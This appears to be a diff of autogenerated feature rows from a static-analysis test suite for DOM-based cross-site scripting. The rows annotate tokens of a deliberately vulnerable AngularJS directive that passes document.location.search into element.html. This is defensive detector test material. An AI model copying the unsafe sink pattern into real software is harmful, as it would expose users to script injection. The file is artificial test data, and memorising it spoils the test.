autogenerated/Xss/DomBasedXss/tst.js:95:19:98:13 | return of method link | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:28:95:32 | scope | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:28:95:32 | scope | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:95:28:95:32 | scope | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:28:95:32 | scope | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:95:28:95:32 | scope | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:35:95:41 | element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:35:95:41 | element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:95:35:95:41 | element | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:95:35:95:41 | element | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:95:35:95:41 | element | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:35:95:41 | element | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:95:35:95:41 | element | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:95:35:95:41 | element | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:95:35:95:41 | element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:95:35:95:41 | element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:23 | element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:23 | element | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:23 | element | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:23 | element | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:23 | element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:28 | element.html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:28 | element.html | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:28 | element.html | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:28 | element.html | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:28 | element.html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:54 | element ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:54 | element ... search) | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:54 | element ... search) | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:54 | element ... search) | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:54 | element ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:54 | exceptional return of element ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:54 | exceptional return of element ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:54 | exceptional return of element ... search) | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:54 | exceptional return of element ... search) | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:96:17:96:54 | exceptional return of element ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:96:25:96:28 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:96:25:96:28 | html | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:96:25:96:28 | html | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:96:25:96:28 | html | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:96:25:96:28 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:96:30:96:37 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:96:30:96:37 | document | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:96:30:96:37 | document | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:96:30:96:37 | document | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:96:30:96:37 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:96:30:96:46 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:96:30:96:46 | document.location | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:96:30:96:46 | document.location | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:96:30:96:46 | document.location | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:96:30:96:46 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:96:30:96:53 | documen ... .search | CalleeFlexibleAccessPath | element.html | | autogenerated/Xss/DomBasedXss/tst.js:96:30:96:53 | documen ... .search | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:96:30:96:53 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16397,6 +114176,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:96:30:96:53 | documen ... .search | enclosingFunctionName | directive#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:96:30:96:53 | documen ... .search | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:96:30:96:53 | documen ... .search | receiverName | element | +| autogenerated/Xss/DomBasedXss/tst.js:96:39:96:46 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:96:39:96:46 | location | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:96:39:96:46 | location | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:96:39:96:46 | location | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:96:39:96:46 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:96:48:96:53 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:96:48:96:53 | search | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:96:48:96:53 | search | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:96:48:96:53 | search | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:96:48:96:53 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:23 | element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:23 | element | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:23 | element | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:23 | element | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:23 | element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:28 | element.html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:28 | element.html | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:28 | element.html | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:28 | element.html | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:28 | element.html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:36 | element.html('SAFE') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:36 | element.html('SAFE') | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:36 | element.html('SAFE') | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:36 | element.html('SAFE') | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:36 | element.html('SAFE') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:36 | exceptional return of element.html('SAFE') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:36 | exceptional return of element.html('SAFE') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:36 | exceptional return of element.html('SAFE') | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:36 | exceptional return of element.html('SAFE') | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:97:17:97:36 | exceptional return of element.html('SAFE') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:97:25:97:28 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:97:25:97:28 | html | contextSurroundingFunctionParameters | ()\n(scope, element) | +| autogenerated/Xss/DomBasedXss/tst.js:97:25:97:28 | html | enclosingFunctionBody | link scope element element html document location search element html SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:97:25:97:28 | html | enclosingFunctionName | directive#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:97:25:97:28 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:97:30:97:35 | 'SAFE' | CalleeFlexibleAccessPath | element.html | | autogenerated/Xss/DomBasedXss/tst.js:97:30:97:35 | 'SAFE' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:97:30:97:35 | 'SAFE' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16405,16 +114219,74 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:97:30:97:35 | 'SAFE' | enclosingFunctionName | directive#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:97:30:97:35 | 'SAFE' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:97:30:97:35 | 'SAFE' | receiverName | element | +| autogenerated/Xss/DomBasedXss/tst.js:101:6:101:12 | service | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:101:6:101:12 | service | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:101:6:101:12 | service | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:101:14:101:25 | "myService3" | CalleeFlexibleAccessPath | angular.module().service().service().directive().service | | autogenerated/Xss/DomBasedXss/tst.js:101:14:101:25 | "myService3" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:101:14:101:25 | "myService3" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:101:14:101:25 | "myService3" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:101:14:101:25 | "myService3" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:101:27 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:101:27 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:101:27 | this | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:101:27 | this | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:101:27 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | 'arguments' object of anonymous function | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | 'arguments' object of anonymous function | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 